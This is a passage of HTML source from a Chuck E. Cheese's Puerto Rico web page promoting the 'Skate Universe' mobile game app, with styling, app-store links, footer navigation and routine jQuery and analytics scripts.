    #su-details h3 { font-size: 2.4em; line-height: 1em; color: #0064be !important; }
    #su-details h3 span { font-size: 1.3em; }
    #su-buttons a { width: 42%; }
    #su-buttons a:first-child { width: 48%; }
    #sub-img img { margin: 0 -22px -28px 0; }
  }
  @media(min-width: 320px) and (max-width: 479px){
    #su-details h3 { font-size: 1.7em; line-height: 1.1em; color: #0064be !important; }
    #su-details h3 span { font-size: 1.4em; }
    #su-sub h3 { font-size: 1.7em; }
  }

		
  .clearfix:before, .clearfix:after { content: " "; display: table; }
  .clearfix:after { clear: both; }
</style>
<script>
  $(function(){
    setImage();
    $(window).on('resize', function(){
      setImage();
    });
  });

  function setImage(){
    if($(window).width() < 768){
      $('#sub-img img').attr('src', 'http://chuckecheese.com/_content_assets/files/images/skate%20universe/su-phone-m.png');
    } else {
      $('#sub-img img').attr('src', 'http://chuckecheese.com/_content_assets/files/images/skate%20universe/Skate_Uni_Lndg_Pg_F1_03.png');
    }
  }
</script>

<div id="skate-universe">
  <h2><img src="http://chuckecheese.com/_content_assets/files/images/skate%20universe/skate-universe-logo.jpg" alt="Skate Universe Logo"></h2>
  <div id="su-details">
    <div class="clearfix">
      <div id="su-text">
        <h3>Download<br> <span>Chuck E.'s new app</span><br> today!</h3>
        <h3>You can win up to<br> <span>1,000 tickets</span><br> to redeem on your<br> next visit.</h3>
        <div id="su-buttons" class="clearfix">
          <a href="https://itunes.apple.com/us/app/chuck-e.-cheeses-skate-universe/id885035735?ls=1&amp;mt=8" target="_blank" id="link23"><img src="http://chuckecheese.com/_content_assets/files/images/skate%20universe/app-store-btn.png" alt=""></a>
          <a href="https://play.google.com/store/apps/details?id=com.cec.skateuniverse&amp;hl=en" target="_blank" id="link24"><img src="http://chuckecheese.com/_content_assets/files/images/skate%20universe/google-play-btn.png" alt="Android App on Google Play"></a>
        </div>
      </div>
      <div id="su-image">
        <img src="http://chuckecheese.com/_content_assets/files/images/skate%20universe/su-chucke.png" alt="Chuck E. Cheese">
      </div>
    </div>
    <div id="su-legal">
      <p>See how far you can skate as Chuck E. attempts to go for the ultimate distance record. The only limit is what you can get away with! Help Chuck E. hop, dodge and duck any obstacles that get in his way. Earn points by picking up Golden Pizzas and other special objects. Plus, you can unlock some cool gear along the way – insane items like "The Giant Pickle Board" or "The Tongue" – you'll have to skate them to believe them. Then, see how you can rank on the Leaderboards, where you can try to beat a lineup of Chuck E. Cheese's superstars, like Munch or even Steve Waters!</p>
    </div>
  </div>
  <div id="su-sub" class="clearfix">
    <h3>Grab A Board, <span>Let's Shred!</span></h3>
    <div id="sub-img">
      <img src="http://chuckecheese.com/_content_assets/files/images/skate%20universe/Skate_Uni_Lndg_Pg_F1_03.png" alt="Skate Universe on your phone">
    </div>
  </div>
</div>							</div> <!-- /.mm -->
						</div>
					</div>
	  				<div class="bl">
	  					<div class="br">
	  						<div class="bm">
	  						</div>
	  					</div>
	  				</div>
	  			</div> <!-- /.box -->
	  		</div> <!-- /.span -->

		</div> <!-- /.row -->

	</div> <!-- / .container -->
        
    <footer class="container" style="background: url('_images/bg.jpg') repeat #9655b9; width: 100%; margin-top: 0;">
  <nav>
    <a href="/chuckecheesespuertorico/la-experiencia.html">La Experiencia</a>
    <a href="/chuckecheesespuertorico/eventos.html">Fiestas y Eventos</a>
    <a href="/chuckecheesespuertorico/cumple.html">Cumpleaños</a>
    <a href="/chuckecheesespuertorico/memorias_compartidas.html">Memorias Compartidas</a>
    <a href="/chuckecheesespuertorico/chuck_E_club.html">Chuck E-Club</a>
    <a href="/chuckecheesespuertorico/reglas-de-Chuck-E-Cheeses.html">Reglas de Chuck E. Cheese’s</a>
    <a href="/chuckecheesespuertorico/localidades.html">Contacto</a>
  </nav>
  <div id="socialicons">
    <fb:like href="https://www.facebook.com/chuckecheesespr" show_faces="false" send="false" layout="button_count" font="arial" colorscheme="light" action="like"></fb:like>
    <a id="facebook" class="social-media trackable external" href="https://www.facebook.com/chuckecheesespr" title="Facebook Footer" target="_blank"><span>Facebook</span></a><!--
    --><a id="twitter" class="social-media trackable external" href="https://twitter.com/ChuckECheesespr" title="Twitter Footer" target="_blank"><span>Twitter</span></a><!--
    -->
  </div>
</footer>



<div class="modal hide fade fixed-width" id="modal">
	<div class="modal-header warning">
	    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
	    <h3>Warning</h3>
	</div>
	<div class="modal-body">
	    <p>You are leaving the Chuck E. Cheese's website and going to that of a non-affiliated third-party vendor engaged to provide online services for us. The vendor's site is not under our control and the security and privacy protection offered may be less than or differ from that of Chuck E. Cheese's. Do you want to continue?</p>
	    <!--<p>
		    <a href="#" id="external-link-display">External Link</a>
	    </p>-->
	</div>
	<div class="modal-footer">
	    <a href="#" class="btn" data-dismiss="modal" id="link42">Close</a>
	    <a href="#" class="btn btn-purple" id="confirm-external-link">Continue</a>
	</div>
</div>

<script type="text/javascript">
    $(document).ready(function () {
        if ($('.download').length) {
            $(".dcontainer").css('paddingRight', "0px");
        }
    });
</script>




        <!--[if IE 7]><script src="/bundles/json?v=bMo5pKunpjb4z2OGXBR-hs-So-UJDNsx2sRh96TpOpo1"></script>
<![endif]-->
<script src="/bundles/interiorjs?v=7Kue5TuTlLY5wjbdGxp1FuhL2V8cpsEsdykt4QFxdkY1"></script>


<script type="text/javascript">
    $(document).ready(function () {
        var doc = $('html');
        //Handle flash and touch devices
        var isTouchDevice = "ontouchstart" in document.documentElement;
        if (doc.hasClass('flash9') && !isTouchDevice) {
            $("#carousel, #carouselThumbs").show();
        } else if (!doc.hasClass('flash9') && !isTouchDevice) {
            $(".games-no-flash").show();
        } else if (isTouchDevice) {
            $(".games-touch-device").show();
        }
    });
</script>

        <script>(function() { 
var _fbq = window._fbq || (window._fbq = []); 
if (!_fbq.loaded) { 
var fbds = document.createElement('script'); 
fbds.async = true; 
fbds.src = '//connect.facebook.net/en_US/fbds.js'; 
var s = document.getElementsByTagName('script')[0]; 
s.parentNode.insertBefore(fbds, s); 
_fbq.loaded = true; 
} 
_fbq.push(['addPixelId', '706542282751810']); 
})(); 
window._fbq = window._fbq || []; 
window._fbq.push(['track', 'PixelInitialized', {}]); 
</script> 
<noscript>&lt;img height="1" width="1" alt="" style="display:none" src="https://www.facebook.com/tr?id=706542282751810&amp;amp;ev=PixelInitialized" /&gt;</noscript>
        
    <script src="_js/jquery.gallery.js" type="text/javascript"></script>
    <script src="_js/main.js" type="text/javascript"></script>
    <script src="_js/site-tracking.js" type="text/javascript"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
    

</body></html>